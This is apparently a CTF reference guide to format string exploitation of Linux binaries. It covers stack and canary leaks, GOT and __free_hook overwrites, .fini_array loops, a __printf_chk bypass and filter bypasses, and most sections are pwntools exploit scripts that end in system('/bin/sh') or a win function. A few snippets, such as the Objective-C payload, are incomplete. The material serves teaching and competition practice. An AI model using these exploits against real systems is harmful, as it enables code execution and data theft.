# CTF Pwn - Format String Exploitation ## Table of Contents - [Format String Basics](#format-string-basics) - [Argument Retargeting (Non-Positional %n Trick)](#argument-retargeting-non-positional-n-trick) - [Blind Pwn (No Binary Provided)](#blind-pwn-no-binary-provided) - [Format String with Filter Bypass](#format-string-with-filter-bypass) - [Format String Canary + PIE Leak](#format-string-canary--pie-leak) - [__free_hook Overwrite via Format String (glibc < 2.34)](#__free_hook-overwrite-via-format-string-glibc--234) - [.rela.plt / .dynsym Patching](#relaplt--dynsym-patching) - [Format String for Game State Manipulation (UTCTF 2026)](#format-string-for-game-state-manipulation-utctf-2026) - [Format String Saved EBP Overwrite for .bss Pivot (PlaidCTF 2015)](#format-string-saved-ebp-overwrite-for-bss-pivot-plaidctf-2015) - [argv[0] Overwrite for Stack Smash Info Leak (HITCON CTF 2015)](#argv0-overwrite-for-stack-smash-info-leak-hitcon-ctf-2015) - [Format String .fini_array Loop for Multi-Stage Exploitation (Codegate 2016)](#format-string-fini_array-loop-for-multi-stage-exploitation-codegate-2016) - [__printf_chk Bypass with Sequential %p (VolgaCTF 2017)](#__printf_chk-bypass-with-sequential-p-volgactf-2017) - [Leak + GOT Overwrite in Single printf Call (picoCTF 2017)](#leak--got-overwrite-in-single-printf-call-picoctf-2017) - [Objective-C %@ Format Specifier Exploitation (SHA2017)](#objective-c--format-specifier-exploitation-sha2017) - [strlen Integer Truncation Bypass (ASIS CTF Finals 2017)](#strlen-integer-truncation-bypass-asis-ctf-finals-2017) --- ## Format String Basics - Leak stack: `%p.%p.%p.%p.%p.%p` - Leak specific offset: `%7$p` - Write value: `%n` (4-byte), `%hn` (2-byte), `%hhn` (1-byte), `%lln` (8-byte) - GOT overwrite for code execution **Write size specifiers (x86-64):** | Specifier | Bytes Written | Use Case | |-----------|---------------|----------| | `%n` | 4 | 32-bit values | | `%hn` | 2 | Split writes | | `%hhn` | 1 | Precise byte writes | | `%lln` | 8 | Full 64-bit address (clears upper bytes) | **IMPORTANT:** On x86-64, GOT entries are 8 bytes. Using `%n` (4-byte) leaves upper bytes with old libc address garbage. Use `%lln` to write full 8 bytes and zero upper bits. **Arbitrary read primitive:** ```python def arb_read(addr): # %7$s reads string at address placed at offset 7 payload = flat({0: b'%7$s#', 8: addr}) io.sendline(payload) return io.recvuntil(b'#')[:-1] ``` **Arbitrary write primitive:** ```python from pwn import fmtstr_payload payload = fmtstr_payload(offset, {target_addr: value}) ``` **Manual GOT overwrite (x86-64):** ```python # Format: %c%$lln + padding + address # Address at offset 8 when format is 16 bytes win = 0x4011f6 target_got = 0x404018 # e.g., printf@GOT fmt = f'%{win}c%8$lln'.encode() # Write 'win' chars then store to offset 8 fmt = fmt.ljust(16, b'X') # Pad to 16 bytes (2 qwords) payload = fmt + p64(target_got) # Address lands at offset 6 + 16/8 = 8 # Note: This prints ~4MB of spaces - be patient waiting for output ``` **Offset calculation for addresses:** - Buffer typically starts at offset 6 (after register args) - If format string is padded to N bytes, addresses start at offset: `6 + N/8` - Example: 16-byte format → addresses at offset 8 - Example: 32-byte format → addresses at offset 10 - Example: 64-byte format → addresses at offset 14 **Verify offset with test payload:** ```python # Put known address after N-byte format, check with %$p test = b'%8$p___XXXXXXXXX' # 16 bytes payload = test + p64(0xDEADBEEF) # Should print 0xdeadbeef if offset 8 is correct ``` **GOT target selection:** - If `exit@GOT` doesn't work, try other GOT entries - `printf@GOT`, `puts@GOT`, `putchar@GOT` are good alternatives - Target functions called AFTER the format string vulnerability - Check call order in disassembly to pick best target **Key insight:** Format string vulnerabilities are identified by sending `%p.%p.%p` as input -- if hex addresses appear in the output, the program passes user input directly as the format argument to `printf`/`sprintf`. This gives both arbitrary read (`%s` with a target address) and arbitrary write (`%n` family) primitives. ## Argument Retargeting (Non-Positional %n Trick) Use this when you cannot embed addresses (input filtering, newline issues) but can still use `%n` and a stack pointer is available as an argument. **Key idea:** Non-positional specifiers consume arguments in order. You can overwrite a *future* argument (which is itself a pointer) before it is used, then use it as an arbitrary write target. **Why non-positional:** Positional formats (`%22$hn`) are cached up front by glibc, so changing the underlying stack slot after parsing won’t change the pointer. Non-positional `%n` avoids that cache. **Workflow (example):** 1. Leak offsets: find a stack pointer argument you can overwrite (e.g., saved `rbp` on the stack). 2. Advance the argument index with `%c` (each `%c` consumes one argument). 3. Use `%n` to write a 4-byte value into that pointer slot (e.g., make arg22 point to `exit@GOT`). 4. Print additional chars and use `%hn` to write the low 2 bytes to the now-retargeted pointer. **Pattern (conceptual):** ```text %c%c%c...%c # consume args to reach pointer slot %c%n # overwrite pointer slot to target_addr (e.g., exit@GOT) %c%hn # write low 2 bytes of win to that GOT entry ``` **Compute widths:** - After writing `target_addr` with `%n`, the printed count is `C`. - To write low 2 bytes `W` with `%hn`, print: - `delta = (W - (C % 65536)) mod 65536` **When it works well:** - No PIE / Partial RELRO (GOT writable) - You can afford large outputs (millions of chars) **Stack layout discovery (find your input offset):** ```text %1$p %2$p %3$p ... %50$p ``` - Your input appears at some offset (commonly 6-8) - Canary: looks like `0x...00` (null byte at end) - Saved RBP: stack address pattern - Return address: code address (PIE or libc) ## Blind Pwn (No Binary Provided) When no binary is given, use format strings to discover everything: **1. Confirm vulnerability:** ```text > %p-%p-%p-%p 0x563b6749100b-0x71-0xffffffff-0x7ffff9c37b80 ``` **2. Discover protections by leaking stack:** - Find canary (offset ~39, pattern `0x...00`) - Find saved RBP (offset ~40, stack address) - Find return address (offset ~41-43, code pointer) **3. Identify PIE base:** - Leak return address pointing into main/binary - Subtract known offset to get base (may need guessing) **4. Dump GOT to identify libc:** ```python # Read GOT entries for known functions puts_addr = arb_read(pie_base + got_puts_offset) stack_chk_addr = arb_read(pie_base + got_stack_chk_offset) ``` **5. Cross-reference libc database:** - https://libc.blukat.me/ - https://libc.rip/ - Input multiple function addresses to identify exact libc version **Key insight:** Blind pwn without a binary requires systematic discovery: leak stack values to find canary/PIE/libc pointers, use arbitrary read to dump GOT entries, cross-reference leaked addresses against libc databases to identify the exact version, then compute offsets for one_gadget or system(). **6. Calculate libc base:** ```python # From leaked __libc_start_main return or similar libc.address = leaked_ret_addr - known_offset ``` **Common stack offsets (x86_64):** | Offset | Typical Content | |--------|-----------------| | 6-8 | User input buffer | | ~39 | Stack canary | | ~40 | Saved RBP | | ~41-43 | Return address | ## Format String with Filter Bypass **Pattern (Cvexec):** `filter_string()` strips `%` but skippable with `%%%p`. **Filter bypass:** If filter checks adjacent chars after `%`: - `%p` → filtered - `%%p` → properly escaped (prints literal `%p`) - `%%%p` → third `%` survives, prints stack value **GOT overwrite via format string (byte-by-byte with `%hhn`):** ```python # Write last 3 bytes of debug() addr to strcmp@GOT across 3 payloads # Pad address to consistent stack offset (e.g., 14th position) for byte_offset in range(3): target = got_strcmp + byte_offset byte_val = (debug_addr >> (byte_offset * 8)) & 0xff # Calculate chars to print, accounting for previous output payload = f"%%%dc%%%d$hhn" % (byte_val - prev_written, 14) payload = payload.encode().ljust(48, b'X') + p64(target) ``` ## Format String Canary + PIE Leak **Pattern (My Little Pwny):** Format string vulnerability to leak canary and PIE base, then buffer overflow. **Two-stage attack:** ```python # Stage 1: Leak via format string io.sendline(b'%39$p.%41$p') # Canary at offset 39, return addr at 41 leak = io.recvline() canary = int(leak.split(b'.')[0], 16) pie_base = int(leak.split(b'.')[1], 16) - known_offset # Stage 2: Buffer overflow with known canary win = pie_base + win_offset payload = b'A' * buf_size + p64(canary) + p64(0) + p64(win) io.sendline(payload) ``` ## __free_hook Overwrite via Format String (glibc < 2.34) **Pattern (Notetaker, PascalCTF 2026):** Full RELRO + No PIE + format string vulnerability. Can't overwrite GOT, but `__free_hook` is writable. **Key insight:** `free(ptr)` passes `ptr` in `rdi` as first argument. If `__free_hook = system`, then `free("cat flag")` executes `system("cat flag")`. ```python # 1. Leak libc via format string p.sendline(b'%43$p') # __libc_start_main return address libc_base = int(leaked, 16) - LIBC_START_MAIN_RET_OFFSET # 2. Write system() address to __free_hook free_hook = libc_base + libc.symbols['__free_hook'] system_addr = libc_base + libc.symbols['system'] payload = fmtstr_payload(8, {free_hook: system_addr}, write_size='byte') # 3. Trigger: send command as menu input, program calls free(input_buffer) p.sendline(b'cat flag') # free() → system("cat flag") ``` **When to use:** Full RELRO (no GOT overwrite) + glibc < 2.34 (hooks still exist). For glibc >= 2.34, hooks are removed - target return addresses or `_IO_FILE` structs instead. ## .rela.plt / .dynsym Patching **When to use:** GOT addresses contain bad bytes (e.g., 0x0a with fgets), making direct GOT overwrite impossible. Requires `.rela.plt` and `.dynsym` in writable memory. **Technique:** Patch `.rela.plt` relocation entry symbol index to point to different symbol, then patch `.dynsym` symbol's `st_value` with `win()` address. When the original function is called, dynamic linker reads patched relocation and jumps to `win()`. ```python # Key addresses (from readelf -S) REL_SYM_BYTE = 0x4006ec # .rela.plt[exit].r_info byte containing symbol index STDOUT_STVAL_LO = 0x4004e8 # .dynsym[11].st_value low halfword STDOUT_STVAL_HI = 0x4004ea # .dynsym[11].st_value high halfword # Format string writes via %hhn (8-bit) and %hn (16-bit) # 1. Write symbol index 0x0b to r_info byte # 2. Write win() address low halfword to st_value # 3. Write win() address high halfword to st_value+2 ``` **When GOT has bad bytes but .rela.plt/.dynsym don't:** This technique bypasses all GOT byte restrictions since you never write to GOT directly. **Key insight:** When GOT addresses contain bad bytes (e.g., `0x0a` with `fgets`), avoid writing to GOT directly. Instead, patch `.rela.plt` to redirect the relocation to a different `.dynsym` entry, then overwrite that symbol's `st_value` with the target address. The dynamic linker follows the patched chain on the next call. --- ## Format String for Game State Manipulation (UTCTF 2026) **Pattern (Small Blind):** Poker/card game where player name is vulnerable to format string. Stack contains pointers to game state variables (player chips, dealer chips). Write arbitrary values to win condition. **Key insight:** `%n` writes the number of characters printed so far. Use `%Xc` to control that count, then `%N$n` to write to the Nth stack argument (which points to a game variable). **Exploitation:** ```python from pwn import * p = remote('challenge.utctf.live', 7255) p.recvuntil(b'Enter your name: ') # %1000c prints 1000 chars (padding), then %7$n writes 1000 to stack pos 7 # Stack position 7 = pointer to player_chips variable p.sendline(b'%1000c%7$n') # Player now has 1000 chips → triggers win condition # Collect flag from game output ``` **Discovery workflow:** 1. **Confirm format string:** Send `%p.%p.%p.%p` as name, check for hex leaks 2. **Map stack positions:** Try `%6$n`, `%7$n`, `%8$n` with different `%Xc` values 3. **Identify which variable changed:** Compare game output (chips, score, health) before/after 4. **Determine win condition:** May be `player_chips >= threshold` or `player > dealer` 5. **Craft winning payload:** Set player chips high (`%9999c%7$n`) or dealer chips to 0 (`%6$n`) **Common game state patterns on stack:** | Position | Typical Variable | |----------|-----------------| | 6 | Pointer to dealer/opponent state | | 7 | Pointer to player state | | 8-10 | Score, health, inventory | **When `%n` writes to adjacent variables:** If player and dealer chips are adjacent in memory (4 bytes apart), positions N and N+1 point to them. Write 0 to dealer (`%N$n` with 0 chars printed) and high value to player (`%9999c%(N+1)$n`). **Key insight:** Format string vulnerabilities in game binaries are simpler than typical pwn — you don't need shell, just manipulate game state to trigger the win condition. Map stack positions to game variables, then write the winning values. --- ## Format String Saved EBP Overwrite for .bss Pivot (PlaidCTF 2015) **Pattern (EBP):** Format string buffer is in `.bss` (fixed address) rather than on the stack. Classic `%n` arbitrary-write requires attacker addresses on the stack, which is impossible with `.bss` buffers. Instead, overwrite the saved EBP to redirect the function epilogue (`leave; ret`) to the `.bss` buffer. **How `leave; ret` works:** ```asm leave: mov esp, ebp ; esp = saved_ebp pop ebp ; ebp = [saved_ebp] ret: pop eip ; eip = [saved_ebp + 4] ``` **Exploit layout in `.bss` buffer at address `0x0804A080`:** ```text [addr_of_buf-4][padding_to_write_value][%n][shellcode...] ``` Write `buf_addr - 4` (e.g., `0x0804A07C`) into saved EBP via `%n`. On function return, `leave` sets `esp = 0x0804A07C`, then `ret` jumps to the value at `0x0804A080` — the start of shellcode. **Key insight:** When the format string buffer is at a fixed `.bss` address (not stack), overwrite saved EBP to pivot the stack into `.bss`. The `leave; ret` epilogue uses EBP to set ESP, so controlling EBP controls where `ret` reads EIP from. Place shellcode address (or ROP chain) at `buf_addr` and shellcode at `buf_addr + offset`. --- ## argv[0] Overwrite for Stack Smash Info Leak (HITCON CTF 2015) **Pattern (nanana):** When a stack canary is corrupted, glibc's `__stack_chk_fail` prints: `*** stack smashing detected ***: terminated`. Since `argv[0]` is a pointer stored on the stack, overwriting it with the address of a secret (e.g., global password buffer) leaks the secret through the crash message. **Attack steps:** 1. Overflow past the canary (deliberately corrupting it) 2. Continue overwriting the stack to reach `argv[0]` (pointer to program name) 3. Replace `argv[0]` with the address of the target data (e.g., `0x601090` = `g_password`) 4. The stack smash handler prints: `*** stack smashing detected ***: ` ```python # Overflow to overwrite argv[0] with address of global password payload = b"A" * canary_offset # reach canary (deliberately corrupt it) payload += b"B" * (argv0_offset - canary_offset) # padding to argv[0] payload += p64(password_addr) # overwrite argv[0] -> password string ``` **Key insight:** A "failed" exploit that triggers `__stack_chk_fail` becomes an information leak when `argv[0]` is overwritten. This is useful as a first stage: leak a secret (password, canary, address), then use it in a second connection for the real exploit. Works because `argv` is stored on the stack above local variables. --- ## Format String .fini_array Loop for Multi-Stage Exploitation (Codegate 2016) **Pattern:** When no GOT function is called after `printf()`, chain multiple format string writes across re-executions by overwriting `.fini_array` with `main()`: 1. **Stage 1:** Overwrite `.fini_array[0]` with `main()`, leak libc + stack pointers 2. **Stage 2:** Overwrite `printf@GOT` with `system()`, overwrite `__stack_chk_fail@GOT` with `main()` 3. **Stage 3:** Deliberately corrupt stack canary so `__stack_chk_fail` re-enters `main()`. Now `printf(input)` is `system(input)` -- send `/bin/sh` ```python # Stage 1: loop back via .fini_array, leak addresses payload = fmtstr_payload(offset, {fini_array: main_addr}) # Stage 2: redirect printf to system, set up canary fail re-entry payload = fmtstr_payload(offset, {printf_got: system, stack_chk_got: main_addr}) # Stage 3: corrupt canary -> __stack_chk_fail -> main -> system(input) ``` **Key insight:** `.fini_array` entries are called when `main()` returns. Overwriting with `main()` creates an execution loop for multi-stage format string attacks. Deliberately corrupting the canary triggers `__stack_chk_fail` as a controlled re-entry vector when that GOT entry has been redirected. **References:** Codegate 2016 --- ## __printf_chk Bypass with Sequential %p (VolgaCTF 2017) **Pattern:** `__printf_chk()` blocks `%n` writes and direct parameter access (`%123$p`). Bypass by chaining sequential `%p` specifiers to reach the desired stack offset. ```python from pwn import * # __printf_chk restrictions: # - No %n/%hn/%hhn writes # - No direct access: %123$p fails # - Sequential access still works: %p%p%p... # Leak canary at stack offset 267: payload = "%p." * 267 + "%p" # sequential %p to offset 267 io.sendline(payload.encode()) response = io.recvline().decode() leaks = response.split(".") canary = int(leaks[266], 16) # 267th value (0-indexed) # Leak libc return address at offset 269: payload = "%p." * 269 + "%p" io.sendline(payload.encode()) response = io.recvline().decode() leaks = response.split(".") libc_ret = int(leaks[268], 16) libc_base = libc_ret - known_offset # Then use stack overflow for ROP since format string write is blocked payload = b"A" * buf_size payload += p64(canary) payload += p64(0) # saved rbp payload += p64(pop_rdi) payload += p64(binsh_addr) payload += p64(system_addr) io.sendline(payload) ``` **Key insight:** While `__printf_chk` prevents `%n` and direct parameter access (`%N$`), it still allows sequential format specifiers. Chaining hundreds of `%p` reaches any stack offset, enabling leaks (canary, libc, PIE) even without write capability. Combine with a separate overflow vulnerability for the write stage. **When to recognize:** Binary uses `__printf_chk` or `__fprintf_chk` (visible in disassembly or via `__fortify_source`). Direct `%N$p` fails but sequential `%p%p%p...` still works. Output may be very large -- parse carefully with delimiters. **References:** VolgaCTF 2017 --- ## Leak + GOT Overwrite in Single printf Call (picoCTF 2017) **Pattern:** When a format string vulnerability is followed immediately by `exit(0)`, combine address leak and GOT overwrite in a single printf invocation. ```python from pwn import * # Must leak libc AND redirect exit() in one printf call # Layout: padding + dummy_addr + %leak$p + %Nc + %write$hn + padding + got_addr exit_got = elf.got['exit'] main_addr = elf.sym['main'] target_low16 = main_addr & 0xFFFF payload = b'e_______' # 8 bytes padding payload += p64(0x4141414141) # dummy (consumed by leak specifier) payload += b' %25$p' # leak libc address at offset 25 # Calculate bytes needed: target_low16 - bytes_written_so_far bytes_written = len(payload) padding_needed = (target_low16 - bytes_written) % 0x10000 payload += f'%{padding_needed}c%19$hn'.encode() # write low 2 bytes to offset 19 payload += b'A' * ((8 - (len(payload) % 8)) % 8) # alignment to 8 bytes payload += p64(exit_got) # address for %19$hn write # Result: leaks libc via %25$p AND overwrites exit@GOT via %19$hn # exit() jumps back to main for second-stage exploitation io.sendline(payload) # Parse leaked libc address from output io.recvuntil(b' 0x') libc_leak = int(io.recv(12), 16) libc_base = libc_leak - known_offset # Second pass: now with libc known, overwrite for shell # ... ``` **Key insight:** A single `printf` can perform both reads (`%p`) and writes (`%hn`) simultaneously. When `exit()` immediately follows the vulnerability, overwrite `exit@GOT` with `main`'s address in the same call that leaks libc, creating a re-entry point for full exploitation. The key is careful offset calculation so the leak specifier and write specifier reference the correct stack positions. **When to recognize:** Format string vulnerability with only one shot before `exit()` or another terminating function. The single-call technique avoids needing a loop or re-entry mechanism before establishing one. **References:** picoCTF 2017 --- ## Objective-C %@ Format Specifier Exploitation (SHA2017) **Pattern:** Objective-C's `NSLog` and related functions support the `%@` format specifier, which calls `objc_msg_lookup(rdi, ...)` treating the corresponding stack value as an Objective-C object pointer. Control the stack value pointed to by `%N$@` to control `rdi`. Analysis of `objc_msg_lookup` reveals a `call rax` gadget reachable with crafted conditions, enabling one-shot execution. **Mechanism:** ```text NSLog(@"Hello %@", user_input) → %@ consumes next argument from stack → argument is treated as Objective-C object pointer (rdi) → objc_msg_lookup(rdi, "description") is called → if [rdi+8] == 0 (ISA check fails), execution reaches: call rax → rax is under attacker control via the crafted "object" ``` **Exploitation:** ```python # Craft a fake Objective-C object on the stack via format string write # Object layout: [isa_ptr][method_list_ptr][...] # Set isa_ptr = 0 to reach the call rax path in objc_msg_lookup # Set rax = one_gadget or system() via prior %n writes # Locate %N$@ position: stack offset where fake object pointer lands # Use %n to write fake object address at the right stack slot # Then trigger %@ to call objc_msg_lookup → call rax → shell payload = b'%c%$lln' # write fake obj addr payload += b'%$@' # trigger call rax ``` **Key insight:** Objective-C format strings include `%@` which invokes `objc_msg_lookup` on a stack pointer — turns a read-only FSB into a controlled-call primitive via the objc runtime. The `call rax` gadget inside `objc_msg_lookup` is reachable when the ISA pointer check fails, making a crafted "null ISA" object sufficient to redirect execution. **References:** SHA2017 --- ## strlen Integer Truncation Bypass (ASIS CTF Finals 2017) **Pattern:** Binary filters format string input by checking that each character up to `strlen(input)+1` is lowercase. However, the `strlen()` result is cast to `int8_t`: at input length 255, `(int8_t)(255 + 1)` overflows to 0, collapsing the sanitization window to an empty range. Format specifiers like `%n` placed beyond byte 255 bypass the filter entirely. **Vulnerable code pattern:** ```c void filter(char *input) { int8_t len = (int8_t)strlen(input); // truncates at 255 → wraps to -1 or 0 for (int8_t i = 0; i <= len; i++) { // at len==-1 (255 cast): 0 <= -1 is false if (!islower(input[i])) reject(); } } ``` **Exploitation:** ```python # Pad with 255 lowercase bytes, then place %n-based payload starting at byte 255 # The filter checks bytes 0..len, but len wraps to -1 (or 0+1=0), so no bytes checked filler = b'a' * 255 exploit_suffix = b'%7$n' + p64(target_addr) # unchecked bytes payload = filler + exploit_suffix ``` **Key insight:** `strlen()` cast to `int8_t` produces signed overflow at length 255, collapsing the sanitization window to zero. Any payload content placed at or beyond byte 255 escapes the filter. Always check for integer truncation when a length field is stored in a signed or short type. **References:** ASIS CTF Finals 2017